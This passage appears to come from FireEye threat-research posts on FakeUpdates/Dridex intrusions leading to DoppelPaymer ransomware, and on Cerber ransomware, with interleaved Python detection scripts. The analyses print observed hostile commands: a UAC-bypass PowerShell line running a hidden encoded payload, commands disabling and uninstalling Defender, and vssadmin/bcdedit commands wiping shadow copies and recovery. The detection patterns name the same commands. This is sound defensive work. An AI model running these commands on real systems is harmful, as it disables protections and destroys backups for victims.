                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

              During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

              "C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

              Figure 10: Sample command used to execute the Nircmd tool to take desktop screenshots

              The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


              Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

              Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

              All Hands on Deck

              In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

              We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


              Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

              In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

              During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


              Figure 13: Attacker executed commands

              The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified that the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows User Account Control (UAC) bypass technique that launches executables via eventvwr.exe, as shown in Figure 14.

              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


              Figure 14: PowerShell event viewer bypass

              Ransomware Attacks & Operator Tactics

              Within these investigations, FireEye identified the deployment of either BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

              The ransomware and additional reconnaissance tools were downloaded through public file-sharing websites such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the Sysinternals utility PsExec to distribute and execute the ransomware.

              Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

              Event Log | EID | Message
              Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
              Microsoft-Windows-PowerShell%4Operational | 600 | HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender
              Application | 1034 | Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

              Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring
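The artifacts in Figures 14 and 15 are all visible in Windows event logs, so the natural check is a small rule set over PowerShell EID 600 (HostApplication) and Application EID 1034 (Windows Installer product removal) records, plus the eventvwr.exe-parent methodology FireEye names in its detection list. The Python below is an added example, not FireEye's code; the event records are constructed to mirror the figures, and the security-product name list is an assumed starting point.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    log: str                 # channel as it appears in the .evtx file name ("%4" encodes "/")
    eid: int
    message: str
    parent_image: str = ""   # populated only for process-creation style records

@dataclass
class Alert:
    rule: str
    eid: int
    evidence: str

# Rules derived from Figure 14 (Invoke-EventVwrBypass) and Figure 15 (pre-ransomware
# defense evasion). Matched case-insensitively because PowerShell parameters are.
POWERSHELL_RULES = [
    ("Defender real-time monitoring disabled",
     r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true"),
    ("Windows Defender feature uninstalled",
     r"Uninstall-WindowsFeature\b.*Windows-Defender"),
    ("Hidden encoded PowerShell staged from a registry value",
     r"\bgp\b.*HKCU:.*;\s*powershell\b.*-W\s+Hidden\b.*-enc\b"),
]
# Product-name fragments whose MSI removal (Application EID 1034) deserves an alert.
# A starting list (assumption), not the post's: add whichever agents your estate runs.
SECURITY_PRODUCT_HINTS = ("McAfee", "Defender", "Symantec", "CrowdStrike", "SentinelOne", "Sophos")

def host_application(message: str) -> str:
    """Pull the command line out of a PowerShell EID 600 'HostApplication=' field."""
    m = re.search(r"HostApplication=(.*)", message)
    return m.group(1).strip() if m else ""

def evaluate(event: Event) -> list:
    alerts = []
    channel = event.log.replace("%4", "/")
    if channel.endswith("PowerShell/Operational") and event.eid == 600:
        cmd = host_application(event.message)
        for name, pattern in POWERSHELL_RULES:
            if re.search(pattern, cmd, re.I):
                alerts.append(Alert(name, event.eid, cmd))
    elif channel == "Application" and event.eid == 1034:
        # Product name is the first "-++-"-separated field after "Product Name:".
        m = re.search(r"Product Name:\s*(.+?)(?:-\+\+-|\.\s)", event.message)
        product = m.group(1).strip() if m else ""
        if any(h.lower() in product.lower() for h in SECURITY_PRODUCT_HINTS):
            alerts.append(Alert("Security product removed via Windows Installer", event.eid, product))
    if event.parent_image.lower().endswith("eventvwr.exe") and "powershell" in event.message.lower():
        alerts.append(Alert("PowerShell spawned by eventvwr.exe (UAC bypass methodology)",
                            event.eid, event.message))
    return alerts

def scan(events: list) -> list:
    """Evaluate every record and flatten the alerts."""
    return [a for e in events for a in evaluate(e)]

# Constructed sample records mirroring Figures 14 and 15 (not real log exports).
EVENTS = [
    Event("Microsoft-Windows-PowerShell%4Operational", 600,
          "HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    Event("Microsoft-Windows-PowerShell%4Operational", 600,
          "HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender"),
    Event("Application", 1034,
          "Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033"
          "-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82."),
    Event("Microsoft-Windows-PowerShell%4Operational", 600,
          "HostApplication=powershell.exe -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update)"
          ".Update); powershell -NoP -NonI -W Hidden -enc $x",
          parent_image="C:\\Windows\\System32\\eventvwr.exe"),
    Event("Microsoft-Windows-PowerShell%4Operational", 600,
          "HostApplication=powershell.exe Get-MpPreference"),   # benign: reads, does not disable
]

if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(f"[EID {alert.eid}] {alert.rule}: {alert.evidence}")
```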

              The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


              Figure 16: DoppelPaymer ransomware note observed during a Mandiant Incident Response investigation

              Ransomware? Not In My House!

              Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

              Ransomware also raises the stakes for unprepared organizations, as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need access to the most sensitive parts of your organization – they need access to the ones that will disrupt business processes. This widens your attack surface, but luckily, it also gives you more opportunity for detection and response. Mandiant recently published an in-depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

              Indicators

              The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.


              Detecting the Techniques

              FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

              Platform: Endpoint Security
              Signature Names:
              • HX Exploit Detection
              • Empire RAT (BACKDOOR)
              • EVENTVWR PARENT PROCESS (METHODOLOGY)
              • Dridex (BACKDOOR)
              • Dridex A (BACKDOOR)
              • POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
              • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
              • FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

              Platform: Network Security
              Signature Names:
              • Backdoor.FAKEUPDATES
              • Trojan.Downloader.FakeUpdate
              • Exploit.Kit.FakeUpdate
              • Trojan.SSLCert.SocGholish

              MITRE ATT&CK Technique Mapping

              ATT&CK Tactic: Techniques
              • Initial Access: Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)
              • Execution: PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)
              • Persistence: DLL Search Order Hijacking (T1038)
              • Privilege Escalation: Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)
              • Defense Evasion: Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)
              • Credential Access: Credential Dumping (T1003)
              • Discovery: Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)
              • Lateral Movement: Remote Desktop Protocol (T1076), Remote File Copy (T1105)
              • Collection: Data from Local System (T1005), Screen Capture (T1113)
              • Command And Control: Commonly Used Port (T1436), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)
              • Exfiltration: Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)
              • Impact: Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

              Acknowledgements

              A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

              Catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

              Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

              UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report:

              • Windows Firewall rule configurations to block specific binaries from establishing outbound connections from endpoints
              • Domain Controller isolation and recovery planning steps
              • Proactive GPO permissions review and monitoring guidance

              Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

              In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

              Ransomware is commonly deployed across an environment in two ways:

              1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
                • Manually run encryptors on targeted systems.
                • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
                • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
                • Deploy encryptors with existing software deployment tools utilized by the victim organization.
              2. Automated propagation:
                • Credential or Windows token extraction from disk or memory.
                • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
                • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

              The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

              • Endpoint segmentation
              • Hardening against common exploitation methods
              • Reducing the exposure of privileged and service accounts
              • Cleartext password protections

              If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

              Read the report today.

              *Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.


              Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

              Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

              On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

              Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

              FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

              Attack Process

              The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

              1. Target receives and opens a Word document.
              2. Macro in document is invoked to run PowerShell in hidden mode.
              3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
              4. On successful connection, the ransomware is written to the disk of the victim.
              5. PowerShell executes the ransomware.
              6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
              7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
              8. Files are encrypted and messages are presented to the user requesting payment.

              Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

              The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

              PowerShell Abuse

              When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

              Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

              It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

              In this case we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

              Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

              Cerber in Action

              Initial payload behavior

              Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

              If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. It then executes the copy from the new location and cleans up after itself.

              Shadow deletion

              As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"
WMIC.exe "shadowcopy delete"
Bcdedit.exe "/set {default} recoveryenabled no"
Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
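
As an added defender's example, not code from the original post or from FireEye: the Python below runs the behaviour described in the PowerShell Abuse and Shadow deletion passages (an Office parent spawning PowerShell with bypass, hidden-window and encoded-command switches, followed by vssadmin, WMIC and bcdedit tampering in that process's lineage) over constructed Sysmon-style process-creation records. The host names, PIDs, file paths and the base64 blob are made up for the example.

```python
import re

# Images that should never spawn a script interpreter, and the interpreters watched.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

# PowerShell switches the post describes: policy bypass, hidden window and an encoded
# ("encrypted" in the post) command. PowerShell accepts unambiguous parameter prefixes.
PS_SUSPICIOUS = [
    (re.compile(r"-(?:executionpolicy|ex|ep)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(?:windowstyle|w)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
]

# Backup and boot-recovery tampering commands quoted in the post.
RECOVERY_TAMPER = [
    ("vssadmin.exe", re.compile(r"delete\s+shadows", re.I), "vssadmin shadow deletion"),
    ("wmic.exe", re.compile(r"shadowcopy\s+delete", re.I), "wmic shadow deletion"),
    ("bcdedit.exe", re.compile(r"recoveryenabled\s+no", re.I), "windows recovery disabled"),
    ("bcdedit.exe", re.compile(r"bootstatuspolicy\s+ignoreallfailures", re.I), "boot failure prompts suppressed"),
]

def ev(host, pid, ppid, image, parent, cmdline):
    return {"host": host, "pid": pid, "ppid": ppid, "image": image, "parent_image": parent, "cmdline": cmdline}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
PAYLOAD = r"C:\Users\alice\AppData\Roaming\profilest.exe"
ENCODED = "QQBhAGEA" * 5  # placeholder base64 blob standing in for the real encoded command

# Constructed, Sysmon-style process-creation records; ws01 reproduces the chain from the
# post, ws02 is routine administration that must not alert.
SAMPLE_EVENTS = [
    ev("ws01", 4100, 880, WORD, r"C:\Windows\explorer.exe", r'"WINWORD.EXE" /n "invoice.doc"'),
    ev("ws01", 4212, 4100, PS, WORD,
       f"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand {ENCODED}"),
    ev("ws01", 4300, 4212, PAYLOAD, PS, "profilest.exe"),
    ev("ws01", 4310, 4300, r"C:\Windows\System32\vssadmin.exe", PAYLOAD, "vssadmin.exe delete shadows /all /quiet"),
    ev("ws01", 4311, 4300, r"C:\Windows\System32\wbem\WMIC.exe", PAYLOAD, "WMIC.exe shadowcopy delete"),
    ev("ws01", 4312, 4300, r"C:\Windows\System32\bcdedit.exe", PAYLOAD, "bcdedit.exe /set {default} recoveryenabled no"),
    ev("ws01", 4313, 4300, r"C:\Windows\System32\bcdedit.exe", PAYLOAD,
       "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ev("ws02", 5100, 900, PS, r"C:\Windows\explorer.exe", r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
    ev("ws02", 5200, 5100, r"C:\Windows\System32\vssadmin.exe", PS, "vssadmin.exe list shadows"),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(event):
    """Stand-alone indicators for one record, as (rule, detail) pairs."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["cmdline"]
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", f"{parent} -> {image}"))
    if image == "powershell.exe":
        hits = [label for rx, label in PS_SUSPICIOUS if rx.search(cmd)]
        if hits:
            findings.append(("powershell_evasive_switches", ", ".join(hits)))
    for exe, rx, label in RECOVERY_TAMPER:
        if image == exe and rx.search(cmd):
            findings.append(("recovery_tampering", label))
    return findings

def descends_from(pid, ancestors, parent_of):
    """True if following ppid links upward from pid reaches any pid in `ancestors`."""
    seen = set()
    while pid in parent_of and pid not in seen:
        seen.add(pid)
        pid = parent_of[pid]
        if pid in ancestors:
            return True
    return False

def detect(events):
    """Correlate per host. 'critical' = the chain from the post (suspicious PowerShell whose
    descendants tamper with backups/boot recovery); 'high' = tampering alone; 'medium' = delivery alone."""
    by_host = {}
    for e in events:
        by_host.setdefault(e["host"], []).append(e)
    verdicts = {}
    for host, evs in by_host.items():
        parent_of = {e["pid"]: e["ppid"] for e in evs}
        findings, delivery_pids = [], set()
        for e in evs:
            for rule, detail in check_event(e):
                findings.append({"pid": e["pid"], "rule": rule, "detail": detail})
                if rule != "recovery_tampering":
                    delivery_pids.add(e["pid"])
        if not findings:
            continue
        tamper = [f for f in findings if f["rule"] == "recovery_tampering"]
        linked = any(descends_from(f["pid"], delivery_pids, parent_of) for f in tamper)
        severity = "critical" if tamper and linked else "high" if tamper else "medium"
        verdicts[host] = {"severity": severity, "findings": findings}
    return verdicts
```

Calling detect(SAMPLE_EVENTS) rates ws01 as critical with six findings and reports nothing for ws02, because the lineage check ties the four tampering commands back to the Office-spawned PowerShell.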

              Coercion

              People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

              Figure 2. A message to the victim after encryption

              The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.


              Figure 3. Ransom offered to victim, which is discounted for five days

              Multilingual Support

              As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4. Interface provided to the victim to pay the ransom supports 12 languages

              Encryption

Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

              Selective Targeting

              Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked the system's keyboard layout to further ensure it avoided infecting machines in the attackers' geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

              Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

              Anti VM Checks

              The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

              Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

              Persistence

              Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

              • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
• The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware is launched each time the Windows command interpreter, “cmd.exe”, is launched.
              • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
• Common persistence methods such as the Run and RunOnce keys are also used.

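
As an added example, not the post's or FireEye's code, this Python audit checks an autoruns-style snapshot for the four persistence locations listed above (Command Processor AutoRun, the screensaver value, Run/RunOnce, the Startup folder) and correlates them. The key and folder paths are real Windows locations; the snapshot itself, the user name, the {GUID} folder and the mstsc.exe copy name are constructed.

```python
import re
from collections import defaultdict

# Autostart locations the post lists. The key and folder paths are real; the snapshot
# below, the {GUID} folder and the "mstsc.exe" copy name are constructed for this example.
AUTORUN_KEY = r"HKCU\Software\Microsoft\Command Processor\AutoRun"
DESKTOP_KEY = r"HKCU\Control Panel\Desktop"
RUN_KEYS = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
}
STARTUP_DIR = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
USER_WRITABLE = re.compile(r"\\AppData\\|\\ProgramData\\|\\Temp\\", re.I)
DROPPED = r"C:\Users\alice\AppData\Roaming\{GUID}\mstsc.exe"

# Constructed autoruns-style snapshot: (location, value or file name, target command line).
SNAPSHOT = [
    (AUTORUN_KEY, "", DROPPED),
    (DESKTOP_KEY, "SCRNSAVE.EXE", DROPPED),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "mstsc", DROPPED),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "mstsc", DROPPED),
    (STARTUP_DIR, "mstsc.lnk", DROPPED),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (STARTUP_DIR, "desktop.ini", ""),
]

def exe_path(target):
    """Drop quotes and arguments from an autostart target, leaving the lower-cased executable path."""
    t = target.strip().strip('"')
    m = re.match(r'(.*?\.(?:exe|scr|bat|cmd|vbs|js))(?:\s|"|$)', t, re.I)
    return (m.group(1) if m else t).lower()

def audit(snapshot):
    """Per-entry indicators, plus one correlation: the same executable registered in several
    autostart locations. That is what the post describes, and what a legitimate entry such as
    OneDrive (flagged only because it lives under AppData) does not do."""
    findings, locations_by_target = [], defaultdict(set)
    for location, name, target in snapshot:
        if not target:
            continue
        path = exe_path(target)
        locations_by_target[path].add(location)
        if location == AUTORUN_KEY:
            findings.append(("cmd_autorun_set", path))  # rarely set at all on a workstation
        elif location == DESKTOP_KEY and name.upper() == "SCRNSAVE.EXE" and not path.endswith(".scr"):
            findings.append(("screensaver_not_scr", path))
        elif (location in RUN_KEYS or location == STARTUP_DIR) and USER_WRITABLE.search(path):
            findings.append(("autostart_from_user_writable", path))
    for path, locations in locations_by_target.items():
        if len(locations) >= 2:
            findings.append(("same_target_in_multiple_autostarts", f"{path} ({len(locations)} locations)"))
    return findings
```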
              A Solid Defense

Mitigating ransomware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

              Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be possible depending on your organization.

              FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

              Conclusion

              Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

              Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

              HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. Also, at FireEye, we go one step further and contact relevant authorities to bring down these types of campaigns.

              Click here for more information about Exploit Guard technology.


              Connected Cars: The Open Road for Hackers

